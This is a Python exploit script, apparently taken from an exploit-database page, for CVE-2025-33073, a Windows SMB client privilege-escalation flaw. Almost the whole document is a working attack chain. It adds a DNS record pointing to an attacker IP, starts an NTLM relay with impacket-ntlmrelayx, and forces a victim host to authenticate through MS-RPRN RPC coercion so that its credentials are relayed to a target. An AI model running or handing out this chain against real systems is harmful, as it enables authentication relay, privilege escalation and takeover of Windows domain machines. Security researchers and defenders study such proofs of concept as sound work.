1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
|
#!/usr/bin/env python3
# Exploit Title: Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)
# Author: Mohammed Idrees Banyamer
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-06-13
# Tested on: Windows 11 version 22H2, Windows Server 2022, Kali Linux 2024.2
# CVE: CVE-2025-33073
# Type: Remote
# Platform: Microsoft Windows (including Windows 10, Windows 11, Windows Server 2019/2022/2025)
# Attack Vector: Remote via DNS injection and RPC coercion with NTLM relay
# User Interaction: Required (authenticated domain user)
# Remediation Level: Official Fix Available
import argparse
import subprocess
import socket
import time
import sys
def inject_dns_record(dns_ip, dc_fqdn, record_name, attacker_ip):
print("[*] Injecting DNS record via samba-tool (requires admin privileges)...")
cmd = [
"samba-tool", "dns", "add", dns_ip, dc_fqdn,
record_name, "A", attacker_ip, "--username=Administrator", "--password=YourPassword"
]
try:
subprocess.run(cmd, check=True)
print("[+] DNS record successfully added.")
except subprocess.CalledProcessError:
print("[!] Failed to add DNS record. Check credentials and connectivity.")
sys.exit(1)
def check_record(record_name):
print("[*] Verifying DNS record propagation...")
for i in range(10):
try:
result = socket.gethostbyname_ex(record_name)
if result and result[2]:
print(f"[+] DNS record resolved to: {result[2]}")
return True
except socket.gaierror:
time.sleep(2)
print("[!] DNS record did not propagate or resolve.")
return False
def start_ntlmrelay(target):
print("[*] Starting NTLM relay server (impacket-ntlmrelayx)...")
try:
subprocess.Popen([
"impacket-ntlmrelayx", "-t", target, "--no-smb-server"
])
print("[*] NTLM relay server started.")
except Exception as e:
print(f"[!] Failed to start NTLM relay server: {e}")
sys.exit(1)
def trigger_coercion(victim_ip, fake_host):
print("[*] Triggering victim to authenticate via MS-RPRN RPC coercion...")
cmd = [
"rpcping",
"-t", f"ncacn_np:{victim_ip}[\\pipe\\spoolss]",
"-s", fake_host,
"-e", "1234",
"-a", "n",
"-u", "none",
"-p", "none"
]
try:
subprocess.run(cmd, check=True)
print("[+] Coercion RPC call sent successfully.")
except subprocess.CalledProcessError:
print("[!] RPC coercion failed. Verify victim connectivity and service status.")
sys.exit(1)
def main():
parser = argparse.ArgumentParser(description="Windows 11 SMB Client Elevation of Privilege PoC using DNS Injection + NTLM Relay + RPC Coercion")
parser.add_argument("--attacker-ip", required=True, help="IP address of the attacker-controlled server")
parser.add_argument("--dns-ip", required=True, help="IP address of the DNS server (usually the DC)")
parser.add_argument("--dc-fqdn", required=True, help="Fully qualified domain name of the domain controller")
parser.add_argument("--target", required=True, help="Target system to relay authentication to")
parser.add_argument("--victim-ip", required=True, help="IP address of the victim system to coerce authentication from")
args = parser.parse_args()
record = "relaytrigger"
fqdn = f"{record}.{args.dc_fqdn}"
inject_dns_record(args.dns_ip, args.dc_fqdn, record, args.attacker_ip)
if not check_record(fqdn):
print("[!] DNS verification failed, aborting.")
sys.exit(1)
start_ntlmrelay(args.target)
time.sleep(5) # Wait for relay server to be ready
trigger_coercion(args.victim_ip, fqdn)
print("[*] Exploit chain triggered. Monitor ntlmrelayx output for authentication relays.")
if __name__ == "__main__":
main()
|